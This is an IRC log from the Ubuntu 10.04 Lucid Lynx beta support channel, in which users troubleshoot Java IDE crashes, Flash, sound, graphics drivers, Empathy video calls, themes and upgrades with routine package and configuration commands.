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=== jpds changed the topic of #ubuntu+1 to: Official Ubuntu Lucid Lynx support/discussion | IRC Guidelines: https://wiki.ubuntu.com/IrcGuidelines | Milestones: https://wiki.ubuntu.com/LucidLynxSchedule | Beta 2 released: http://www.ubuntu.com/testing/lucid/beta2
Oxymoronhttp://pastebin.com/uzMbrApm - Anyone?18:14
agronholmyofel, what kinds of issues18:15
yofelagronholm: I can't remember anymore what was up with eclipse, but various applets just didn't work right with icedtea, so I'm using the sun plugin now18:17
Oxymoronyofel: DO you also have problems with Ecplise?18:20
dupondjeI upgraded my other system to Lucid. After replacing grub with grub2, i'm getting the following errors in the grub2 installation: You have a memory leak (not released memory pool):18:20
yofelOxymoron: right now not anymore, I don't use it that often though18:22
Oxymoronyofel: Well look on this: http://pastebin.com/uzMbrApm Zend Studio work with Eclipse as ground nad I think that Java thing you mentioned is the problem. X just kill Zend Studio sometimes and give me errors. It worked for me like thwo days ago or so.18:23
Oxymoronyofel: How did you solve your problem?18:23
dupondjehttp://paste.ubuntu.com/417152/ => any idea ?18:26
OxymoronI need to fix my problem, I wont use any other IDE than Zend Studio or Aptana, but none of them work and quits unexepcted.18:26
penguin42dupondje: Well it's a bug but I'm not sure it's broken anything18:26
penguin42dupondje: Do you use lvm?18:27
dupondjeno dmraid ... :)18:27
dupondjeanyway grub2 seems to work :)18:28
yofelOxymoron: not my issue, mine was a while ago and I got odd java errors that vanished after switching to sun-java6. Maybe openjdk is fixed since then, but unless they fix the web plugin I'll stick with sun for the time being18:28
dupondjeits an improvement :P18:28
Oxymoronyofel: How do I switch to sun-java6 instead of openjdk?18:29
Dr_Willisopenoffice - crashing.. abiword crashing...18:29
Dr_Willisgeany works...18:29
yofelOxymoron: install sun-java6 from the partner repos and switch all java dpkg-alternatives to sun18:30
Damascenewhy my recorded video with record my desktop ogv doesn't get recognized by youtube or other sites?18:33
Damascenethe video is really missed up18:33
bjsnideryofel, i don't believe that package exists yet (sun-java6)18:35
ZykoticK9bjsnider, you need to add the partner repo18:35
ZykoticK9bjsnider, it's called sun-java6-plugin18:35
yofelbjsnider: err... well, more or less, 'sun-java6' is the source package, you have sun-java6-jre -jdk -plugin -...18:35
yofelas binaries18:36
bjsnidernice to see it in there18:37
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bjsniderthey said they wouldn't add it until lucid was released18:37
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ZykoticK9bjsnider, it was add on or before March 4, 201018:38
yofelnot really, sun-java6 was in partner a few days after it was removed from multiverse18:38
yofelmaybe the partner repos just isn't enabled in devel?18:38
Roastedif I install 10.04 on my spare desktop now and fully update it later when its released, will it be "patched" up to par with the final release version?18:40
yofel!final | Roasted18:40
ubottuRoasted: If you installed a Alpha/Beta/RC version of Ubuntu 10.04 (Lucid Lynx) and have been keeping it up to date, then you are already running the latest version of Lucid. To make sure, type ยซ sudo apt-get update && sudo apt-get dist-upgrade ยป in a console.18:40
Roastedokaty, thanks.18:41
RoastedI'm going to install the daily build now. just wanted to make sure.18:41
gsp2009Hello everyone. Has anyone had audio probs with beta2? I have searched and it seems to be a pulse issue. Is ALSA better?18:42
ZykoticK9gsp2009, common misconception - pulse actually uses ALSA for low level sound hardware access18:44
gsp2009ZykoticK9: hmmm... interesting. So really my prob could be either of them. Any ideas where to start? I tried checking the output settings as recommended... no joy.18:45
om26eris there a list of gnome shortcut keys for different funtions in different apps?18:45
ZykoticK9gsp2009, i'm affraid the resident sound expert seems to be idle right now i'm affraid -- and I'm no sound expert.  Best of luck man.18:45
gsp2009om26er: system -> prefs -> kb shortcuts18:46
gsp2009ZykoticK9: thanks.18:46
om26ergsp2009, emh, actually I was looking for the gnome standard keys like this key is for accounts this to refresh and ...18:47
dupondjesomebody knows if its possible to add a bookmark to a nfs share, that will get mounted after opening it ?18:49
penguin42dupondje: You can use the /net automount18:49
penguin42oh, ubuntu doesn't have /net - hmm18:50
dupondjepenguin42: and it doesn't need to automount (cause then I can add it to fstab), but only mount when clicking the icon :)18:50
penguin42dupondje: Yeh not sure how to do that, I was just thinking automount would be easiest18:51
dmarkeyso whats the easiest way to install flash on 10.0418:51
dmarkeybeta 218:51
gsp2009dmarkey: software centre -> partners..18:52
JEEBsvIs this an evil way to install 32bit flash? Get the tar.gz for the 10.1 rc (since it contains a shitload of fixes) and extract to ~/.mozilla/plugins :318:52
JEEBsvof course, it doesn't install it globally18:53
dmarkeygsp2009: "Ubuntu software center"?18:54
yofelJEEBsv: that's not evil but your choice of plugin18:54
gsp2009dmarkey: bottom of the application list18:54
dmarkeygsp2009: have it open, dont see partnets anywhere though18:55
dupondjeJEEBsv: its easyer to use the package ofc. Me for example use your way to install 64bit plugin :p18:55
gsp2009dmarkey: on the left menu, it should say "Canonical Partners"18:55
dmarkeyalthough take into account im running the livecd18:55
ZykoticK9dmarkey, you need to add the partner repo from Software Sources before it will show up in Software Center18:55
JEEBsvyofel: yah, since the 10.0X revisions have problems with weighted prediction in video and bug otherwise + the 10.1 rc works fine for me -> I go with 10.118:56
majnoonwas wondering what is name of next version ??18:58
Drone4foursynaptic tells me that the nvidia-current installed is version 195.36.15 but nvidia settings manager tells me the nvidia driver version installed is version 173.14.22.  how do I install the latest drivers?18:58
ZykoticK9majnoon, Ubuntu 10.10 a.k.a. Maverick Meerkat18:58
yofelmajnoon: 10.10 will be maverick meerkat (I hope I spelled it right)18:58
ubottumedibuntu is a repository of packages that cannot be included into the Ubuntu distribution for legal reasons - See http://www.medibuntu.org18:59
frankIs it better to do a fresh install of ubuntu lucid lynx or is is it better to run sudo apt-get update-dist ?18:59
SwedeMikefrank: what do you have right now? 9.10 or earlier 10.04 ?19:00
gsp2009dmarkey: did you find it?19:00
frankI have 9.1019:01
dmarkeygsp2009: just updating cache19:01
gsp2009dmarkey: :)19:01
* gsp2009 wishes he had sound.19:02
dmarkeygsp2009: installing, what about mp3 etc19:02
gsp2009dmarkey: install ubuntu restricted extras19:03
majnoonlooks like medibuntu TEMP broken for lucid19:03
gsp2009dmarkey: and look for mp3 for gstreamer19:03
SwedeMikefrank: upgrade should work just fine, but it'll probably be quicker with fresh install.19:03
JoshuaLubuntu should design a nice quick start icon for openoffice :( the one shipped with openoffice doesnt fit in the theme at all19:04
mandrewhello anyone with experience of msi wind U160?19:04
frankSwedeMike, will this leave me with a lot of useless lib files?19:04
joaopintofrank, just run: do-release-upgrade -d19:05
gsp2009Anyone have problems with sound that they were able to fix?19:05
blue-frogmajnoon, use mirrors for medibuntu19:05
SwedeMikefrank: shouldn't too much.19:05
SwedeMikefrank: most people upgrade, it's designed to work.19:05
arandmandrew: Maybe at: https://wiki.ubuntu.com/HardwareSupport19:05
blue-frogmajnoon, https://bugs.launchpad.net/medibuntu/+bug/56581019:06
ubottuLaunchpad bug 565810 in medibuntu "packages.medibuntu.org not available" [High,Confirmed]19:06
mandrewis there more drivers for netbook in ubuntu netbook remix? im having problems with the w-lan card19:06
frankSwedeMike, thanks for your help19:06
mandrewive looked there cant fin any info arand19:06
Roastedjust booted to a daily build of 10.04 32 bit and I get initramfs.... it wont boot to either install or livecd. whats up?19:06
majnoonit NOT a biggy and be fixed SOON19:07
gsp2009Roasted: you have two monitors?19:07
arandmandrew: https://wiki.ubuntu.com/HardwareSupport/Machines/Netbooks was the one I meant, sorry... and that particualr one doesn't seem to be there, but the other similar might be relevant.19:08
Roastedgsp2009, not on this system, no.19:08
Roastedgsp2009, installing it on a spare rig of mine... 1gb ram, p4 3.0ghz, single 22 inch lcd, etc19:09
majnoonblue-frog, how long it been down ??19:09
mandrewthanks arand19:09
gsp2009Roasted: ok. I had the same prob. I had to unplug one monitor to boot19:09
blue-frogmajnoon, don't know. since this morning at least (europe CET)19:09
Roastedgsp2009, hahaha no kidding?? thats a weird fix. let me try it.19:10
majnoonshould be up within 24 hours so not really woried19:10
majnoonjust a pain,nothing major19:10
dmarkeyhmm audio is borked19:10
dmarkeyseems ok in alsamixer19:11
gsp2009dmarkey: that is why I am here... hoping someone knows how to fix.19:11
limikaelanyone who has tried to install wine on 10.04 ? how does it work?19:11
Blue11limikael: seems okay19:11
xapelhi, does anyone know how to get video calls working with gTalk in empathy?19:11
Walzmynlimikael: didn't install, but had it already installed - no problems19:12
Drone4foursynaptic tells me that the nvidia-current installed is version 195.36.15 but nvidia settings manager tells me the nvidia driver version installed is version 173.14.22.  how do I install the latest drivers?19:12
limikaelalright.. will try it then, thanks..19:13
Blue11limikael: I have windows firefox, java, and flash working under wine19:14
gsp2009hey... whats the proggy again for extensive compiz settings?19:14
ZykoticK9gsp2009, ccsm is the abbreviation19:14
gsp2009ZykoticK9: cool.. thanks.19:15
blue-frogDrone4four, what does system/administation/hardware drives says?19:16
Drone4fourblue-frog, what command do i input to show what system/administation/hardware drives says19:16
blue-frogDrone4four, click on the menu I guess19:17
limikaelBlue11: cool! just out of interest, why do you run firefox under wine?19:17
Drone4fournvidia settings says 173.14.22 is installed19:17
Blue11because some apps require it --19:17
blue-frogDrone4four, system/administation/hardware driver19:17
ZykoticK9limikael, wine firefox is actually faster then native linux firefox, and allows a bunch of plugins that native doesn't19:18
Blue11ZykoticK9: this is true19:18
gsp2009Drone4four: if your hardware drivers shows more than one nvidia driver installed, you will have to remove one or two19:18
Blue11compiz does not seem to work with the stock ati driver anymore19:19
xapelhi, does anyone know how to get video calls working with gTalk in empathy?19:19
Drone4fourok ty blue-frog and gsp -- hardware drivers says there is more than one nvidia driver installed.  i'll just remove 173 now =D19:19
Blue11xapel: i don't19:19
Blue11xapel: i have NEVER used empathy19:19
limikaelZykoticK9: ah ok19:19
majnoonblue-frog, so i'll need to boot windows for 24 hours to watch dvds NOT a biggy :)19:19
Roastedgsp2009, that didnt work, but Im gonna power off my laptop that Im on here and see if I can at least boot to the livecd there. thanks.19:20
gsp2009Drone4four: I think I had to remove both, then install the one I wanted19:20
gsp2009Roasted: cool.. good luck.19:20
blue-frogmajnoon, you do what you want. mirrors are availabble but it's your right to use windows19:20
peepsalotwhat is the url to see the list of packages in lucid(to check version #s)?  i tried googling but i'm not finding it19:20
xapelBlue11: how do you make Gtalk video calls on Ubuntu?19:20
Blue11peepsalot: dpkg -l19:21
majnoonblue-frog, i still have some games can only run in windows :( so can't get rid of totally19:21
peepsalotBlue11, i don't have lucid installed, i know there is a webpage that lists pacakge information as well19:21
Blue11xapel: I don't do any video conferenceing at all19:21
peepsaloti have seen it for previous releases19:22
Blue11peepsalot: I wouldn't know - sorry19:22
gsp2009xapel: I just set it up to see... you using empathy?19:22
xapelgsp2009: yes19:22
ZykoticK9peepsalot, http://packages.ubuntu.com/lucid/19:22
Blue11xapel: when I last tried it a few years ago, I used kopete19:22
majnoonblue-frog, though i'm thinking of UPGRADING it to XP from vista19:23
xapelBlue11: A LOT can change in few years :)19:23
majnoonswitch that19:23
majnoonfrom vista to xp19:23
peepsalotthanks ZykoticK919:23
gsp2009xapel: so set up your gtalk account in empathy... open a chat window... then it is Contact -> make video call.19:23
Blue11xapel: it didn't work well so I abandoned it - my netbook will do it, but I don't have anyone to test with.19:24
xapelgsp2009: as soon as I start the video call it hangs up19:24
gsp2009xapel: your cam is working for sure?19:25
xapelgsp2009: yes, i can use skype and cheese19:25
switchgirli have a file here that i can't pastebin, cant send etc but need you lot to see - its 1.1gb19:25
xapelgsp2009: have you made a video call now?19:25
switchgirlits the log19:25
Blue11switchgirl: tail it19:26
Blue11switchgirl: or use dmesg19:26
switchgirlwhat why and how?19:26
gsp2009xapel: hang on... will boot up my other machine19:26
xapelgsp2009: ok19:26
ZykoticK9xapel, you might want to see bug #42157219:27
ubottuLaunchpad bug 421572 in empathy "Video calls with GTalk WEB client (gmail chat) users don't work" [Low,Triaged] https://launchpad.net/bugs/42157219:28
Blue11switchgirl: sudo tail -n 150 /var/log/messages19:28
Blue11lst 150 lines dmesg gives you like last 100 or so19:29
xapelZykoticK9: thanx19:29
kushaloneis 10.04 officiallty frozen yet?19:30
DASPRiDkushalone, feature wise?19:31
xapelZykoticK9: I am actually subscribed to that bug, but there has not been any updates since October 200919:31
kushaloneDASPRiD: yes19:31
Roasteddoes anybody know if theres a way to tweak the color of the menu text and the taskbar text in the default theme in 10.04?19:32
ZykoticK9xapel, i really don't know anything about that bug, or using empathy to video chat -- it just came up on my search.  Good luck man.19:32
kushaloneDASPRiD: I am more concerned with the xorg bugs, to be honest19:32
Blue11Roasted: EASY way is to use antoher them19:32
DASPRiDkushalone, and me with alternate installer bugs, you currently cannot install with raid19:32
switchgirlthink there should be a warning about ufw logging19:33
RoastedBlue11, yeah, but I was just trying to use the default one to get used to it. But man, that text needs to be brighter. I feel like Im looking at a faded CRT from the 80s19:33
kushaloneDASPRiD: I have two 40 gb IDE hard disk drives (master and slave). I am not really considering an RAID array atm19:34
Blue11Roasted: I am using the clear themes one works ok19:34
Blue11switchgirl: wow that's a log or output I usually run with ufw disabled19:35
kklimondaswitchgirl: your problem is not related to ufw logging - your problem is that logs are not rotated19:35
klappiis there a trick to prevent my computer from freezing when i copy via nfs? I didnt have this in karmic19:35
RoastedBlue11, Im a huge fan of dust sand... I just tweak the black text to be jet black instead of the darkish gray they have and besides that it looks good.19:35
Blue11switchgirl: ufw is the linux firewall fwiw19:35
RoastedBlue11, but I like themes with a dark top panel, and the default one in 10.04 looks good except my 20 20 vision seems to think the text color is a little... weird.19:35
kushalonewhen logging out, does Lucid log you out automatically after 60 seconds or do you have to push log out in the pop up menu?19:35
joaopintoklappi, search for similar bug reports, or report it19:35
switchgirli turned off the ufw logging19:36
gsp2009xapel: hey... crashed my empathy when I tried with a web client.19:36
gsp2009xapel: but works between two installed clients19:37
xapelgsp2009: mmmm...interesting19:37
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Blue11i wish they had a green coloured theme19:37
RoastedI wish they had a theme with decent text color choices lololol what19:39
xapelgsp2009: i need to make a talk to a windows pc though, so I need to connect to a web client19:39
Roasteddust sand is like, amazing. but I wish it was a tad darker.19:39
Blue11Roasted: you can customise them19:39
RoastedBlue11, the text color or the dust sand background color?19:40
Blue11it allows you to make a custom theme with colours you choose19:40
Roastedwhat does19:40
Blue11Roasted: the theme picker19:41
Roastedyes, I know that. But when I adjust the dust sand background color, it does change the color of the panel - wh ich is what I want.19:41
Roastedand when I change the color of the text in the default 10.04 theme, it doesnt change the menu - which is what I want19:42
Gentanyone here know if super+u, super+p, or super+v are bound to anything by default?19:42
Blue11Roasted: dunno that's all I've tried19:42
GentI use them as keyboard shortcuts for gedit's external tools but they are not triggering19:42
Blue11Gent: super what?19:42
Gentwindows key19:42
Blue11Gent: oh I don't have that on my k/b19:42
GentIt's a useful key for additional shortcuts despite the windows logo19:43
Blue11yeah mine are disabled I guess by default19:43
Gentor at least it was19:43
Gentbut something seems to be grabbing it19:43
Blue11you looked at System/Preferences/Keyboard Shortcuts19:44
Gentyeah, it doesn't look like any of those user super19:45
Blue11Gent: give it a shot - I have never played with that19:45
Gentwell that doesn't really work for me, the shortcuts are specific to gedit's external tools19:45
Blue11Gent: okay you're way beyond what I know I didnt know gedit had external tools19:46
Gentit's a plugin19:46
Blue11son of a gun, never knew there were plugins for gedit19:47
RoastedBlue11, what theme do you use19:48
Gentthis is really cramping my work flow...19:49
Reckonis there any Ubuntu official admin pdf e.book? Free, of course19:50
Blue11Reckon: dunno19:51
Reckonthanks bluell19:54
ReckonI'm impressed about the boot times Ubuntu takes19:55
Blue11Reckon: all the stuph I have is like 8.10 stuph19:55
Blue11Reckon: I've put a few tips out on http://www.pkill-9.com19:56
xcvhola. need some help with linksys wusb54gs (usb wireless 'g' nic) on lucid 32-bit. lsusb shows the device "Bus 001 Device 002: ID 13b1:000e19:56
Blue11xcv: you have 2 ethernet cards then?19:56
xcvfigured i'd pop in for a chat before wiping the machine and testing it under karmic19:56
xcvno, i'm chatting from a diff machine19:56
Blue11xcv: okay19:57
gsp2009Roasted: sorry... was away... any luck?19:57
Roastedgsp2009, not on the desktop - but I booted it on my laptop just fine.19:58
Roastedgsp2009, I gotta admit, I was disappointed with the default theme though. It looks nice, but the text needs to be much brighter in the top panel/menu. I cant figure out how to change it... so I sorta got sidetracked trying to figure that out :P19:58
spine55does anyone know if there is a way to move the gnome titlebar icons to the right instead of the left in lucid?19:58
Roastedspine55, yes19:59
Blue11spine yes19:59
Roastedspine55, hit ALT + F2 and type gconf-editor19:59
gsp2009Roasted: i felt the same. System -> prefs -> appearance19:59
Roastedapps - metacity - general19:59
Roastedgsp2009, I cant change the text in the top panel/menu though, only for in windows.19:59
Roastedspine55, then change the one entry to close:minimize,maximize,close19:59
RoastedI think thats the order19:59
Blue11spine55: here's how to do it:  http://pkill-9.com/wordpress/?p=20719:59
spine55Roasted: nice thanks everyone20:00
diverse_izzuei have the various indicator applets render wrongly after the first startup, it's as if the drawing were shifted away from the areas where one can click with the mouse. restarting the panel always helps. do others have this issue?20:00
gsp2009Roasted: click customize... then icons..20:00
gsp2009Roasted: I chose humanity dark20:00
Roastedgsp2009, thats for icons, though.20:01
Roastedgsp2009,  I want the actual TEXT color to be brighter.20:01
Roastedgsp2009, like applications/places/system, and everything in the menus. I want that to be brighter.20:01
Roastedgsp2009, its far too blah right now in the default look20:01
gsp2009Roasted: oh sorry.. misread.20:01
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shane2perulaptop connected to projector, can't get both to mirror images, same on both screens, and if I play a presentation with OOo, it only shows on laptop???20:04
gsp2009shane2peru: oh god.. I spent 2 days on that prob... nvidia?20:05
shane2perugsp2009, no worse ATI20:05
gsp2009shane2peru: :(20:06
shane2perugsp2009, when I open System -> Admin -> Monitor I can see them both, but when I change them around, it won't configure them20:06
gsp2009shane2peru: the prob is that there are hardware functions that sometimes bork everything up.20:06
gsp2009have you played with those?20:06
shane2peruboth monitors are there and I can drag them around, but nothing sticks, says can't configure the ctr projector20:07
x4D54756768616Eshane2peru: If you're just wanting OOo to project on the projector, see Slide Show->Slide Show Settings.20:07
xcvBlue11: it's a friend's desktop machine with a flaky optical drive. i took the machine home, installed karmic 32bit via 2gb usb 'thumb' drive, seemed stable but i didn't have the nic for testing. i had it connected via cat 5 and did a "update-manager -d" this past monday. upgrade finished okay and seemed stable so i gave the machine back to the owner, who can't get associated to wireless router. not sure what to do next. this chat20:07
xcvis on my laptop, which is running karmic and associated to the same router.20:07
shane2perux4D54756768616E, wow, never bothered to look there before!  I will tinker with that, thanks!!!20:08
almoxarifeshane2peru: have a look at your bios setting for external viewer, mine has different settings avail20:08
x4D54756768616Eshane2peru: I used to have to do it with PowerPoint on an XP computer at my church. :)20:08
shane2perux4D54756768616E, that did it!!!  I need it for tonight at church, much appreciated for that tip20:09
shane2perualmoxarife, I got it working, thanks!20:09
KDeskHas some one problems with very high ram usage (and then very high swap usage, the system becomming very slow, etc.) with lucid?20:11
BUGabundomy desktop http://dl.dropbox.com/u/112892/desktop.png20:11
duffydackwow, my netbooks battery is being destroyed in 10.04.20:12
Blue11duffydack: what's happening?20:14
Blue11duffydack: I have 9.10 on my netbook (netbook remix) and that seems fine20:15
xcvso, any ideas, room? :)20:18
mirakis it feasible to boot from software RAID ?20:19
duffydackHave had it switched on for approx 3 hours while testing U1, not overusing it as it just let it sit there and check that its filling the folder with the files it should have,  left it idling and its nearly out of power.  i think this is rated for 6-9 hours..  i purposely got the better battery with it, 35.5 Wh, I dont know much about batteries tbh, but I believe it should last a while longer when not being really used much.20:19
itdockyeah as always20:20
itdockcreate /boot as md raid 120:20
TommyThaGun_I just got this error when trying to report a bug: "You have some obsolete package versions installed. Please upgrade the following packages and check if the problem still occurs: libgudev-1.0-0, libthai-data, libthai0, libudev0, shared-mime-info, udev"20:21
TommyThaGun_This issue I'm facing is that apt says those packages are the newest20:21
DanaG1argh, there's something wrong with the linux-alsa-driver-modules ALSA version, for me.20:22
gsp2009DanaG1: me too... no one seems to know how to fix sound20:24
DanaG1Do you have that actual package installed?20:24
gsp2009DanaG1: hang on.. will check20:24
DanaG1it's in the repo ppa:ubuntu-audio-dev20:25
DanaG1Though, for me, it's actually rather thoroughly killing my kernel.20:26
gsp2009DanaG1: nope.. I don't have it.20:26
gsp2009and still don't have sound20:26
gsp2009rather.. I don't have sound as well...20:26
crimsunDanaG1: well, they haven't been updated since the 16th, for starters20:26
crimsunDanaG1: that's due to some upstream screwage with the script used to checkout sound-2.6 master HEAD20:27
crimsunDanaG1: and now, the domain has expired, so takashi's script is borked20:27
DanaG1hmm, which domain expired?20:27
crimsunalso, do you still get the same soft lockup with 2.6.34-rc4 vanilla (mainline)?20:28
KDeskHave the betas something different from the final release (not including bug fixed packages)?20:30
crimsunoh man, I hope I didn't break the entire Dell Mini9/Vostro Axx families :(20:30
crimsunoh whew, I just need to quirk the VREF bit for capture20:31
xcvbueller?... bueller?20:32
crimsunxcv: what?20:34
xcvcrimsun: "hola. need some help with linksys wusb54gs (usb wireless 'g' nic) on lucid 32-bit. lsusb shows the device "Bus 001 Device 002: ID 13b1:000e"20:34
xcv(thank you)20:34
crimsunxcv: and?20:34
xcvcrimsun: oh, 'wireless' disabled in network manager drop-down; OS seems to not be recognizing the device20:36
xcvcrimsun: cripes; it just made a liar out of me -- just got the wireless networks available notification. will try to associate again. brb and thanks for you patience :)20:38
nishanthi just updated to lucid ....does anyone know why the left click does not work on flash player?20:38
Odd-rationalenishanth: it is a known bug. has to do with the desktop effects...20:41
Odd-rationalenishanth: see here for more details: https://bugs.launchpad.net/bugs/41040720:42
ubottuLaunchpad bug 410407 in flashplugin-nonfree "Clicking on items in Flash player does nothing [READ DESCRIPTION]" [High,Confirmed]20:42
Odd-rationale(and some workarounds)20:42
xcvokay, still not associating; not sure if this is related (from dmesg) "tg3 0000:05:02.0: firmware: requesting tigon/tg3_tso5.bin" and later, several "wlan0: setting auth mode failed (FFFFFFD1)"20:47
DanaGcrimsun: works fine on 34-rc4.20:48
rbanffyHi folks. Anyone else from Brazil misses the "รง" the way it was in the old us_intl layout?20:52
xcvokay all, i just booted 9.10 32-bit on same machine, same problem, so not 10.04 issue. thanks for being there -- you rock :)20:58
crimsunDanaG: thanks.21:00
crimsunpersonally find 2.6.34-rc4 a lot more usable than lucid's21:00
DanaGI just wish those radeon PM patches would choose the correct low-power state....21:01
DanaGI have two "battery" modes... and the radeon KMS PM code chooses the higher-powered of the two.21:01
nOStahlhi guys21:18
nOStahlcan one of you do a test for me. go into evolution and try to create a new calendar and see if option google appears21:18
mandrew /join #ubuntu-se21:20
nOStahlanyone see google as an option for evolution calendars?21:21
WalzmynWhy has "firefox" disappeared from my krunner options?21:28
nOStahlhey walzmyn21:30
nOStahlcan you check in evolution for me go to calendars21:30
miraksata hard drives are hotplugable or not ?21:30
nOStahland rightclick where they are and select new calendar21:30
nOStahlsee if you can see google in the list of options21:31
Thistleknothi peeps21:31
Thistleknothelp me pls21:31
Walzmyn<-- running KDE, nOStahl21:31
Thistleknotthis isn't easy21:31
Thistleknotexpresscard booting21:31
Thistleknotbios doesn't support expresscard booting21:31
Thistleknoti tried grub221:31
Thistleknotgrub2 saw the device21:31
ThistleknotI was able to initiate the linux boot21:31
WalzmynThistleknot: one line please21:31
nOStahlanyone here able to check this for me in evolution, it dosnt give me option for google calendar. need to know if its just my system or something21:32
Thistleknotbut when the linux kernel loaded, it lost sight of the ssd, I'm thinking it needs a kernel module21:32
duffydackAny way yet to display the splash at a decent resolution using fglrx..  Nicely like it was using the radeon oss driver21:32
WalzmynnOStahl: is there not an option for a calendar on an external drive or some such that you can point to gcal? That's how Kontact works21:33
nOStahlevolution usually has a specific option for google calendar21:33
nOStahlits not showing up in 10.0421:33
WalzmynnOStahl: *shrug*21:34
Thistleknothttps://answers.launchpad.net/ubuntu/+question/103990 has some info, ata kernel drives for ubuntu?21:35
mandrewis it better to run 64 bit ubuntu if i can or shall i stick to 32 bit on my netbook?21:36
DanaGThistleknot: can you boot from another device and check what lspci and lsusb show?21:37
coc0nutmandrew: Doesn't really make much of a difference21:38
coc0nut64-bit is stable now though.21:38
rbanffyIf I want to discuss something with the folks who design the keyboard layouts, where do I go?21:38
Thistleknotthere it is21:38
ThistleknotI'm out and gonna try this21:38
Walzmynmandrew: i'd go with 64 to make best use of your cpu21:39
aciculaany issues with updating to 10.04 when using an encryted home?21:39
Walzmynacicula: i'm not using encrypted, but a buddy of mine said he had major issues with it - enough that he bailed to arch linux21:40
guntbertacicula: just make certain to have the passphrase recorded an stored in a safe place21:40
aciculathe one i get with unwrap-passphrase ?21:40
guntbertacicula: yes that one21:40
mandrewdoes the 32 bit have a smaller energy footprint?21:40
aciculaguntbert: thanx :)21:41
guntbertacicula: but that was more of a general warning - I myself didn't upgrade (yet)21:42
aciculai havent either, is the passprase all thats needed to mount the encrypted parts manually or is it used to unwrap a key stored somewhere else?21:43
guntbertacicula: you will want to read http://www.linux-mag.com/cache/7568/1.html about it all21:45
aciculaguntbert: thanx will have a read21:45
Walzmynmandrew: this is purely speculation, but I'd think that 64 bit would be more efficent because the processor and OS are both working together and 64 bit OS is going to multithread better21:47
mandrewsound good :D21:50
joaopintoWalzmyn, there is no relation between 64 bits and threads :)21:52
DASPRiDbit is a not so good beer21:53
DanaG64-bit is most useful for processing performance and such.21:58
DASPRiDand for today's RAM equipment :)21:59
mandrewso on a netbook 32 bit is better then?21:59
mandrew1 gb ram21:59
DASPRiDfor 1gb it doesn't really matter, no21:59
mandrewok thanks21:59
DASPRiDthere is no reason against 64bit on the other hand22:00
DASPRiDso if your cpu supports it, install it :)22:00
mandrewthen i need to reinstall :( dont really want to do that :P22:00
DASPRiDi always wondered how one could switch a system to 64bit without reinstalling22:01
duffydackDASPRiD, with a seperate partition for /home, and a pkg list to use, its not really much of a reinstall.  afaik, you cant go to 64bit without a reinstall22:03
terroh8erhello chaps, will i be able to easily update from 10.04 beta to the final version when it comes out?22:04
DASPRiDyes (not guranted by me :))22:05
terroh8erah ok, so i don't have to redownload the iso and install it again? it will be OTA more or less?22:05
Spezilast time i did so i just noticed it because there was quite a lot of updates available when i did apt-get upgrade :P22:06
terroh8erthanks :)22:07
cessaro1My Compaq laptop, previously running 9.04 without any problems at all, will not boot with upgrade to 9.10 beta 2. Any suggestions?22:07
Dekkardcurious..how can i tell if im using nouveau or not?22:07
nOStahlyou need to get a newer version of ubuntu then 9.10 beta222:08
cessaro1where? That seems to be the latest.22:08
nOStahl10.04 beta 2 is the latest and greatest22:09
Mighty_Penguin10.04 is the latest, 9.10 was the last release22:11
cessaro1In the grub menu there are 5 entries, 2 each for the development kernels 20 and 21, and one memtest. I've tried to boot from the 4 kernels, but eventually it indicates that the machine is starting and just hangs.22:11
DASPRiDlast, but not least22:11
nOStahlhey might_penguin are you running gnome22:11
Mighty_PenguinnOStahl, yes22:11
nOStahlcan you check in evolution calendar if you see a selection for google calendar when you go to create a new calendar22:12
nOStahlits not showing up for me im on 10.04 beta2 fully updated22:12
terroh8erthis might be a dumb question, but does ubunbtu take full advantage of multi-core processors like the i7?22:12
Mighty_PenguinnOStahl, give me a minute to figure it out, I've never used evolution before22:12
nOStahlah its awesome when its all configured22:12
duffydackterroh8er, if you mean can it see all 8 threads and turbo boost, yes..22:13
Mighty_PenguinnOStahl, I see a google option when creating a new calendar22:16
nOStahlits not showing on my end22:19
=== Mighty_Penguin is now known as chris4585
nOStahlah weird22:20
nOStahli closed out this timeand went back in and now its there22:20
nOStahlwoot that feels much better22:21
cessaro1ubuntu 10.04 won't boot: In the grub menu there are 5 entries, 2 each for the development kernels 20 and 21 (generic and recovery), and one memtest. I've tried to boot from the 4 kernels, and eventually it indicates that the machine is starting and just hangs. Help!22:22
chris4585nOStahl, cool, evolution isn't that bad22:23
nOStahli like it22:23
nOStahlhavnt found anything that comes close22:23
chris4585there is thunderbird22:23
nOStahlsomething about evolutions layout i just click with though22:24
* duffydack likes the simplicity of simple-mail firefox plugin . i`m not a big emailer22:26
DanaGwho was it that was talking about ssds the other day?22:27
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cessaro1anybody have boot problems with Ubuntu 10.04 beta 2?22:42
simontolHi, anyone here who knows where I can find the new Ubuntu logo fonts?22:43
persiaHey.  I'm having issues getting my sound preferences to redirect sound to my USB headset in recent lucid.  Anyone have any good pointers to track this down?23:00
KDeskhas the beta version the debug things on?23:02
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aciculadebug things?23:06
OxymoronCould someone tip me about some kind of nice editor/IDE that works almsot as well as Zend Studio or Aptana because it isnt working at the moment it crashed once in awhile.23:08
Typhwhat's an easy way to redirect terminal output to a google search23:08
aciculactrl-c/v ?23:09
aciculaKDesk: if you mean gcc debugging symbols then no23:09
Typhhaha, preferably automated :D23:09
KDeskacicula: ah, thanks for the info23:17
blacksunsevenanyone here use vmware-player?23:18
duffydackTyph, I guess it could be done with a cli browser..23:20
CrimsonIdolblacksunseven, -> yes, I do.23:25
blacksunsevenCrimsonIdol: in 10.04?23:25
CrimsonIdolno, 8.0423:27
blacksunsevenCrimsonIdol: it's just eating proc resources like a hungry hungry hippo23:28
CrimsonIdolI have 10.04 in vm now.23:28
blacksunseveni've got it set to 1GB ram with 1 cpu core23:28
CrimsonIdolwhile running a vm?23:28
CrimsonIdoli'm confused... you running it in 10.04 or 10.04 in it?23:29
blacksunsevenrunning xp in it on 10.0423:29
OxymoronSorry for this stupid question, but does someone know why Netbeans looks so ugly? xD :D23:29
chorseOxymoron: yes, Sun/Oracle does.23:29
Oxymoronchorse: Do you know where I can contact them? :)23:30
Dimmuxxwhat's the proper way to gather information when X freezes? I've got an intel gpu23:31
Oxymoronchorse: Its so sad, they have a lot of good potential and have most of features I need but the GUI make me unhappy and not creative at all. I must feel "happy" when I am programming or else it doesnt feel good.23:31
chorseOxymoron: http://www.oracle.com/23:31
Oxymoronchorse: Yes, sure I email right forward to oracle.com ... lol. I meant some real contact info to their development and design team.23:32
chorseOxymoron: I'm sure you find something on their website.23:33
Oxymoronchorse: Well it quite large ...23:33
joaopinto_Dimmuxx, ubuntu-bug xorg23:33
bjsnidernetbeans is a java app isn't it?23:33
joaopinto_that should collect most of required logs23:34
